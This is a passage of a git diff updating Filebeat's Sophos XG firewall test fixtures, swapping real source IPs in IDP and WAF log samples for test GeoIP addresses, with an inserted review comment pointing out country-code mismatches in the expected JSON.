Attack" rule_priority=2 src_ip=77.61.185.101 src_country_code=NLD dst_ip=172.16.68.20 dst_country_code=R1 protocol="TCP" src_port=59476 dst_port=80 platform="Linux,Mac,Other,Unix,Windows" category="server-webapp" target="Server" +<30>device="SFW" date=2020-05-18 time=14:38:54 timezone="CEST" device_name="XG230" device_id=1234567890123456 
log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name="" signature_id=1881 signature_msg="SERVER-WEBAPP bad HTTP 1.1 request - potential worm attack" classification="access to a potentially vulnerable web application" rule_priority=2 src_ip=67.43.156.12 src_country_code=ROU dst_ip=172.16.68.20 dst_country_code=R1 protocol="TCP" src_port=41528 dst_port=80 platform="BSD,Linux,Mac,Other,Solaris,Unix,Windows" category="server-webapp" target="Server" +<30>device="SFW" date=2020-05-18 time=14:38:55 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=23 user_name="" signature_id=1616 signature_msg="PROTOCOL-DNS named version attempt" classification="Attempted Information Leak" rule_priority=1 src_ip=89.160.20.156 src_country_code=CHN dst_ip=67.43.156.12 dst_country_code=R1 protocol="UDP" src_port=58914 dst_port=53 platform="BSD,Linux,Mac,Other,Solaris,Unix,Windows" category="protocol-dns" target="Server" +<30>device="SFW" date=2020-05-18 time=14:38:56 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name="" signature_id=53589 signature_msg="SERVER-WEBAPP DrayTek multiple products command injection attempt" classification="Web Application Attack" rule_priority=2 src_ip=67.43.156.12 src_country_code=NLD dst_ip=172.16.68.20 dst_country_code=R1 protocol="TCP" src_port=59476 dst_port=80 platform="Linux,Mac,Other,Unix,Windows" category="server-webapp" target="Server" <30>device="SFW" date=2018-05-23 time=16:20:34 timezone="BST" device_name="XG750" device_id=SFDemo-f64dd6be log_id=020703406001 log_type="IDP" log_component="Anomaly" log_subtype="Detect" priority=Warning idp_policy_id=1 fw_rule_id=2 user_name="" 
signature_id=26022 signature_msg="FILE-PDF EmbeddedFile contained within a PDF" classification="A Network Trojan was detected" rule_priority=1 src_ip=10.0.0.168 src_country_code=R1 dst_ip=10.1.1.234 dst_country_code=R1 protocol="TCP" src_port=28938 dst_port=25 platform="Windows" category="Malware Communication" target="Server" <30>device="SFW" date=2018-05-23 time=16:16:43 timezone="BST" device_name="XG750" device_id=SFDemo-f64dd6be log_id=020704406002 log_type="IDP" log_component="Anomaly" log_subtype="Drop" priority=Warning idp_policy_id=1 fw_rule_id=2 user_name="" signature_id=26022 signature_msg="FILE-PDF EmbeddedFile contained within a PDF" classification="A Network Trojan was detected" rule_priority=1 src_ip=10.0.1.31 src_country_code=R1 dst_ip=10.1.0.115 dst_country_code=R1 protocol="TCP" src_port=40140 dst_port=25 platform="Windows" category="Malware Communication" target="Server" diff --git a/x-pack/filebeat/module/sophos/xg/test/idp.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/idp.log-expected.json index 59caeaab67dc..de3cb1b31117 100644 --- a/x-pack/filebeat/module/sophos/xg/test/idp.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/idp.log-expected.json @@ -1,7 +1,7 @@ [ { "@timestamp": "2020-05-18T14:38:54.000-02:00", - "client.ip": "89.40.182.58", + "client.ip": "67.43.156.12", "client.port": 41528, "destination.ip": "172.16.68.20", "destination.port": 80, 
@@ -14,7 +14,7 @@ "event.dataset": "sophos.xg", "event.kind": "alert", "event.module": "sophos", - "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:54 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name=\"\" signature_id=1881 signature_msg=\"SERVER-WEBAPP bad HTTP 1.1 request - potential worm attack\" classification=\"access to a potentially vulnerable web application\" rule_priority=2 src_ip=89.40.182.58 src_country_code=ROU dst_ip=172.16.68.20 dst_country_code=R1 protocol=\"TCP\" src_port=41528 dst_port=80 platform=\"BSD,Linux,Mac,Other,Solaris,Unix,Windows\" category=\"server-webapp\" target=\"Server\"", + "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:54 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name=\"\" signature_id=1881 signature_msg=\"SERVER-WEBAPP bad HTTP 1.1 request - potential worm attack\" classification=\"access to a potentially vulnerable web application\" rule_priority=2 src_ip=67.43.156.12 src_country_code=ROU dst_ip=172.16.68.20 dst_country_code=R1 protocol=\"TCP\" src_port=41528 dst_port=80 platform=\"BSD,Linux,Mac,Other,Solaris,Unix,Windows\" category=\"server-webapp\" target=\"Server\"", "event.outcome": "success", "event.severity": "4", "event.timezone": "-02:00", @@ -37,7 +37,7 @@ ], "related.ip": [ "172.16.68.20", - "89.40.182.58" + "67.43.156.12" ], "rule.category": "access to a potentially vulnerable web application", "rule.id": "1881", 
@@ -60,14 +60,13 @@ "sophos.xg.rule_priority": "2", "sophos.xg.src_country_code": "ROU", "sophos.xg.target": "Server", - "source.as.number": 28684, - "source.as.organization.name": "Bestnet Service SRL", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "RO", - "source.geo.country_name": "Romania", - "source.geo.location.lat": 46.0, - "source.geo.location.lon": 25.0, - "source.ip": "89.40.182.58", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.12", "source.port": 41528, "tags": [ "forwarded", @@ -76,9 +75,15 @@ }, { "@timestamp": "2020-05-18T14:38:55.000-02:00", - "client.ip": "117.50.11.192", + "client.ip": "89.160.20.156", "client.port": 58914, - "destination.ip": "172.16.66.155", + "destination.as.number": 35908, + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.12", "destination.port": 53, "event.action": "drop", "event.category": [ 
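Review bot: The new expected output for the first IDP event asserts `"sophos.xg.src_country_code": "ROU"` next to `"source.geo.country_iso_code": "BT"` for 67.43.156.12, so the device-reported country code and the GeoIP enrichment now disagree inside the same event; the same mismatch recurs in the third event (`@@ -212,14 +218,13 @@`, NLD against BT) and in the second event (`@@ -135,16 +140,17 @@`, CHN against a Swedish lookup for 89.160.20.156). It appears to come from the idp.log fixture keeping its original src_country_code values when only the addresses were swapped, which is harmless for the parser test but makes the fixture a misleading reference for how the two fields relate. If the goal is just to keep real public addresses out of the fixtures, consider also rewriting the device-reported codes to match the test database (e.g. `src_country_code=BTN` for the 67.43.156.12 events) so the expected JSON stays internally consistent.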
@@ -89,7 +94,7 @@ "event.dataset": "sophos.xg", "event.kind": "alert", "event.module": "sophos", - "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:55 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=23 user_name=\"\" signature_id=1616 signature_msg=\"PROTOCOL-DNS named version attempt\" classification=\"Attempted Information Leak\" rule_priority=1 src_ip=117.50.11.192 src_country_code=CHN dst_ip=172.16.66.155 dst_country_code=R1 protocol=\"UDP\" src_port=58914 dst_port=53 platform=\"BSD,Linux,Mac,Other,Solaris,Unix,Windows\" category=\"protocol-dns\" target=\"Server\"", + "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:55 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=23 user_name=\"\" signature_id=1616 signature_msg=\"PROTOCOL-DNS named version attempt\" classification=\"Attempted Information Leak\" rule_priority=1 src_ip=89.160.20.156 src_country_code=CHN dst_ip=67.43.156.12 dst_country_code=R1 protocol=\"UDP\" src_port=58914 dst_port=53 platform=\"BSD,Linux,Mac,Other,Solaris,Unix,Windows\" category=\"protocol-dns\" target=\"Server\"", "event.outcome": "success", "event.severity": "4", "event.timezone": "-02:00", @@ -111,13 +116,13 @@ "my_fancy_host" ], "related.ip": [ - "117.50.11.192", - "172.16.66.155" + "67.43.156.12", + "89.160.20.156" ], "rule.category": "Attempted Information Leak", "rule.id": "1616", "rule.name": "PROTOCOL-DNS named version attempt", - "server.ip": "172.16.66.155", + "server.ip": "67.43.156.12", "server.port": 53, "service.type": "sophos", "sophos.xg.category": "protocol-dns", 
@@ -135,16 +140,17 @@ "sophos.xg.rule_priority": "1", "sophos.xg.src_country_code": "CHN", "sophos.xg.target": "Server", - "source.as.number": 4808, - "source.as.organization.name": "China Unicom Beijing Province Network", - "source.geo.continent_name": "Asia", - "source.geo.country_iso_code": "CN", - "source.geo.country_name": "China", - "source.geo.location.lat": 31.0449, - "source.geo.location.lon": 121.4012, - "source.geo.region_iso_code": "CN-SH", - "source.geo.region_name": "Shanghai", - "source.ip": "117.50.11.192", + "source.as.number": 29518, + "source.as.organization.name": "Bredband2 AB", + "source.geo.city_name": "Link\u00f6ping", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "SE", + "source.geo.country_name": "Sweden", + "source.geo.location.lat": 58.4167, + "source.geo.location.lon": 15.6167, + "source.geo.region_iso_code": "SE-E", + "source.geo.region_name": "\u00d6sterg\u00f6tland County", + "source.ip": "89.160.20.156", "source.port": 58914, "tags": [ "forwarded", @@ -153,7 +159,7 @@ }, { "@timestamp": "2020-05-18T14:38:56.000-02:00", - "client.ip": "77.61.185.101", + "client.ip": "67.43.156.12", "client.port": 59476, "destination.ip": "172.16.68.20", "destination.port": 80, 
@@ -166,7 +172,7 @@ "event.dataset": "sophos.xg", "event.kind": "alert", "event.module": "sophos", - "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:56 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name=\"\" signature_id=53589 signature_msg=\"SERVER-WEBAPP DrayTek multiple products command injection attempt\" classification=\"Web Application Attack\" rule_priority=2 src_ip=77.61.185.101 src_country_code=NLD dst_ip=172.16.68.20 dst_country_code=R1 protocol=\"TCP\" src_port=59476 dst_port=80 platform=\"Linux,Mac,Other,Unix,Windows\" category=\"server-webapp\" target=\"Server\"", + "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:56 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name=\"\" signature_id=53589 signature_msg=\"SERVER-WEBAPP DrayTek multiple products command injection attempt\" classification=\"Web Application Attack\" rule_priority=2 src_ip=67.43.156.12 src_country_code=NLD dst_ip=172.16.68.20 dst_country_code=R1 protocol=\"TCP\" src_port=59476 dst_port=80 platform=\"Linux,Mac,Other,Unix,Windows\" category=\"server-webapp\" target=\"Server\"", "event.outcome": "success", "event.severity": "4", "event.timezone": "-02:00", @@ -178,7 +184,7 @@ "host.name": "some_other_host.local", "input.type": "log", "log.level": "warning", - "log.offset": 1243, + "log.offset": 1242, "network.transport": "TCP", "observer.product": "XG", "observer.serial_number": "1234567890123457", @@ -189,7 +195,7 @@ ], "related.ip": [ "172.16.68.20", - "77.61.185.101" + "67.43.156.12" ], "rule.category": "Web Application Attack", "rule.id": "53589", 
@@ -212,14 +218,13 @@ "sophos.xg.rule_priority": "2", "sophos.xg.src_country_code": "NLD", "sophos.xg.target": "Server", - "source.as.number": 1136, - "source.as.organization.name": "KPN B.V.", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "NL", - "source.geo.country_name": "Netherlands", - "source.geo.location.lat": 52.3824, - "source.geo.location.lon": 4.8995, - "source.ip": "77.61.185.101", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.12", "source.port": 59476, "tags": [ "forwarded", @@ -253,7 +258,7 @@ "host.name": "firewall.localgroup.local", "input.type": "log", "log.level": "warning", - "log.offset": 1857, + "log.offset": 1855, "network.transport": "TCP", "observer.product": "XG", "observer.serial_number": "SFDemo-f64dd6be", @@ -321,7 +326,7 @@ "host.name": "firewall.localgroup.local", "input.type": "log", "log.level": "warning", - "log.offset": 2434, + "log.offset": 2432, "network.transport": "TCP", "observer.product": "XG", "observer.serial_number": "SFDemo-f64dd6be", diff --git a/x-pack/filebeat/module/sophos/xg/test/waf.log b/x-pack/filebeat/module/sophos/xg/test/waf.log index 519a84ca2fb0..ed60311864f6 100644 --- a/x-pack/filebeat/module/sophos/xg/test/waf.log +++ b/x-pack/filebeat/module/sophos/xg/test/waf.log 
@@ -1,5 +1,5 @@ -<30>device="SFW" date=2020-05-18 time=14:38:46 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=webmail.elasticuser.com sourceip=89.68.140.204 localip=185.8.209.207 ws_protocol="HTTP/1.1" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie="MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsxYNAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDoAitM4bv3XCA==;MapiSequence=10-GtgsIA==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7PxcrL" referer=- method=POST httpstatus=401 reason="-" extra="-" contenttype="-" useragent="Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4954; Pro)" host=89.68.140.204 responsetime=11199 bytessent=5669 bytesrcv=1419 fw_rule_id=79 -<30>device="SFW" date=2020-05-18 time=14:38:47 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=webmail.elasticuser.com sourceip=89.68.140.204 localip=185.8.209.207 ws_protocol="HTTP/1.1" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie="MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsw0NAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDpeyft5bv3XCA==;MapiSequence=9-Km2JMg==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7Oxc3M" referer=- method=POST httpstatus=200 reason="-" extra="-" contenttype="application/mapi-http" useragent="Microsoft Office/16.0 (Windows NT 6.2; Microsoft Outlook 16.0.4954; Pro)" host=89.68.140.204 responsetime=14086 bytessent=1357 
bytesrcv=1774 fw_rule_id=79 +<30>device="SFW" date=2020-05-18 time=14:38:46 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=webmail.elasticuser.com sourceip=216.160.83.61 localip=185.8.209.207 ws_protocol="HTTP/1.1" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie="MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsxYNAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDoAitM4bv3XCA==;MapiSequence=10-GtgsIA==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7PxcrL" referer=- method=POST httpstatus=401 reason="-" extra="-" contenttype="-" useragent="Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4954; Pro)" host=216.160.83.61 responsetime=11199 bytessent=5669 bytesrcv=1419 fw_rule_id=79 +<30>device="SFW" date=2020-05-18 time=14:38:47 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=webmail.elasticuser.com sourceip=216.160.83.61 localip=185.8.209.207 ws_protocol="HTTP/1.1" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie="MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsw0NAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDpeyft5bv3XCA==;MapiSequence=9-Km2JMg==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7Oxc3M" referer=- method=POST httpstatus=200 reason="-" extra="-" contenttype="application/mapi-http" useragent="Microsoft Office/16.0 (Windows NT 6.2; Microsoft Outlook 16.0.4954; Pro)" host=216.160.83.61 responsetime=14086 
bytessent=1357 bytesrcv=1774 fw_rule_id=79 <30>device="SFW" date=2020-05-19 time=17:20:29 timezone="IST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="jsmith" server=www.iviewtest.com:8989 sourceip=10.198.235.254 localip=10.198.233.48 ws_protocol="HTTP/1.1" url=/ querystring= cookie="-" referer=- method=GET httpstatus=403 reason="Static URL Hardening" extra="No signature found" contenttype="text/html" useragent="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" host=10.198.235.254 responsetime=19310 bytessent=726 bytesrcv=510 fw_rule_id=3 <30>device="SFW" date=2020-05-19 time=18:03:30 timezone="IST" device_name="XG230" device_id=1234567890123456 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="jsmith" server=www.iviewtest.com:8990 sourceip=10.198.235.254 localip=10.198.233.48 ws_protocol="HTTP/1.1" url=/download/eicarcom2.zip querystring= cookie="; PHPSESSID=jetkd9iadd969hsr77jpj4q974; _pk_id.1.fc3a=3a6250e215194a92.1485866024.1.1485866069.1485866024.; _pk_ses.1.fc3a=*" referer=http://www.iviewtest.com:8990/85-0-Download.html method=GET httpstatus=403 reason="Antivirus" extra="EICAR-AV-Test" contenttype="text/html" useragent="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" host=10.198.235.254 responsetime=403214 bytessent=739 bytesrcv=715 fw_rule_id=6 -<30>device="SFW" date=2020-05-20 time=18:03:31 timezone="IST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=- sourceip=83.97.20.30 localip=216.167.51.72 ws_protocol="HTTP/1.0" url=/ querystring="" cookie="-" referer="-" method=GET httpstatus=403 reason="WAF Anomaly" extra="Inbound Anomaly Score Exceeded (Total Score: 7, SQLi=, XSS=): Last Matched Message: Request Missing a User Agent 
Header" contenttype="text/html" useragent="-" host=83.97.20.30 responsetime=608 bytessent=5353 bytesrcv=295 fw_rule_id=3 +<30>device="SFW" date=2020-05-20 time=18:03:31 timezone="IST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=- sourceip=89.160.20.112 localip=216.167.51.72 ws_protocol="HTTP/1.0" url=/ querystring="" cookie="-" referer="-" method=GET httpstatus=403 reason="WAF Anomaly" extra="Inbound Anomaly Score Exceeded (Total Score: 7, SQLi=, XSS=): Last Matched Message: Request Missing a User Agent Header" contenttype="text/html" useragent="-" host=89.160.20.112 responsetime=608 bytessent=5353 bytesrcv=295 fw_rule_id=3 diff --git a/x-pack/filebeat/module/sophos/xg/test/waf.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/waf.log-expected.json index 6b8458c29a55..9ed26bd14d00 100644 --- a/x-pack/filebeat/module/sophos/xg/test/waf.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/waf.log-expected.json @@ -2,18 +2,8 @@ { "@timestamp": "2020-05-18T14:38:46.000-02:00", "client.bytes": 1419, - "client.ip": "89.68.140.204", - "destination.as.number": 199567, - "destination.as.organization.name": "Fr. Sauter AG", + "client.ip": "216.160.83.61", "destination.bytes": 401, - "destination.geo.city_name": "Saint-Prex", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "CH", - "destination.geo.country_name": "Switzerland", - "destination.geo.location.lat": 46.4796, - "destination.geo.location.lon": 6.4599, - "destination.geo.region_iso_code": "CH-VD", - "destination.geo.region_name": "Vaud", "destination.ip": "185.8.209.207", "event.action": "denied", "event.category": [ 
@@ -24,7 +14,7 @@ "event.dataset": "sophos.xg", "event.kind": "alert", "event.module": "sophos", - "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:46 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=webmail.elasticuser.com sourceip=89.68.140.204 localip=185.8.209.207 ws_protocol=\"HTTP/1.1\" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie=\"MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsxYNAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDoAitM4bv3XCA==;MapiSequence=10-GtgsIA==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7PxcrL\" referer=- method=POST httpstatus=401 reason=\"-\" extra=\"-\" contenttype=\"-\" useragent=\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4954; Pro)\" host=89.68.140.204 responsetime=11199 bytessent=5669 bytesrcv=1419 fw_rule_id=79", + "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:46 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=webmail.elasticuser.com sourceip=216.160.83.61 localip=185.8.209.207 ws_protocol=\"HTTP/1.1\" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie=\"MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsxYNAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDoAitM4bv3XCA==;MapiSequence=10-GtgsIA==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7PxcrL\" referer=- method=POST httpstatus=401 reason=\"-\" extra=\"-\" contenttype=\"-\" 
useragent=\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4954; Pro)\" host=216.160.83.61 responsetime=11199 bytessent=5669 bytesrcv=1419 fw_rule_id=79", "event.severity": "6", "event.timezone": "-02:00", "event.type": [ @@ -47,7 +37,7 @@ ], "related.ip": [ "185.8.209.207", - "89.68.140.204" + "216.160.83.61" ], "server.bytes": 5669, "server.ip": "185.8.209.207", @@ -56,7 +46,7 @@ "sophos.xg.device": "SFW", "sophos.xg.device_name": "XG230", "sophos.xg.fw_rule_id": "79", - "sophos.xg.host": "89.68.140.204", + "sophos.xg.host": "216.160.83.61", "sophos.xg.log_component": "Web Application Firewall", "sophos.xg.log_type": "WAF", "sophos.xg.message_id": "17071", @@ -64,18 +54,17 @@ "sophos.xg.querystring": "?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com", "sophos.xg.responsetime": "11199", "sophos.xg.server": "webmail.elasticuser.com", - "source.as.number": 6830, - "source.as.organization.name": "Liberty Global B.V.", + "source.as.number": 209, "source.bytes": 1419, - "source.geo.city_name": "Gdynia", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "PL", - "source.geo.country_name": "Poland", - "source.geo.location.lat": 54.5055, - "source.geo.location.lon": 18.5403, - "source.geo.region_iso_code": "PL-22", - "source.geo.region_name": "Pomerania", - "source.ip": "89.68.140.204", + "source.geo.city_name": "Milton", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 47.2513, + "source.geo.location.lon": -122.3149, + "source.geo.region_iso_code": "US-WA", + "source.geo.region_name": "Washington", + "source.ip": "216.160.83.61", "tags": [ "forwarded", "sophos-xg" 
@@ -88,18 +77,8 @@ { "@timestamp": "2020-05-18T14:38:47.000-02:00", "client.bytes": 1774, - "client.ip": "89.68.140.204", - "destination.as.number": 199567, - "destination.as.organization.name": "Fr. Sauter AG", + "client.ip": "216.160.83.61", "destination.bytes": 200, - "destination.geo.city_name": "Saint-Prex", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "CH", - "destination.geo.country_name": "Switzerland", - "destination.geo.location.lat": 46.4796, - "destination.geo.location.lon": 6.4599, - "destination.geo.region_iso_code": "CH-VD", - "destination.geo.region_name": "Vaud", "destination.ip": "185.8.209.207", "event.action": "denied", "event.category": [ 
@@ -110,7 +89,7 @@ "event.dataset": "sophos.xg", "event.kind": "alert", "event.module": "sophos", - "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:47 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=webmail.elasticuser.com sourceip=89.68.140.204 localip=185.8.209.207 ws_protocol=\"HTTP/1.1\" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie=\"MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsw0NAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDpeyft5bv3XCA==;MapiSequence=9-Km2JMg==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7Oxc3M\" referer=- method=POST httpstatus=200 reason=\"-\" extra=\"-\" contenttype=\"application/mapi-http\" useragent=\"Microsoft Office/16.0 (Windows NT 6.2; Microsoft Outlook 16.0.4954; Pro)\" host=89.68.140.204 responsetime=14086 bytessent=1357 bytesrcv=1774 fw_rule_id=79", + "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:47 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=075000617071 log_type=\"WAF\" log_component=\"Web Application Firewall\" priority=Information user_name=\"-\" server=webmail.elasticuser.com sourceip=216.160.83.61 localip=185.8.209.207 ws_protocol=\"HTTP/1.1\" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie=\"MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsw0NAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDpeyft5bv3XCA==;MapiSequence=9-Km2JMg==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7Oxc3M\" referer=- method=POST httpstatus=200 reason=\"-\" extra=\"-\" 
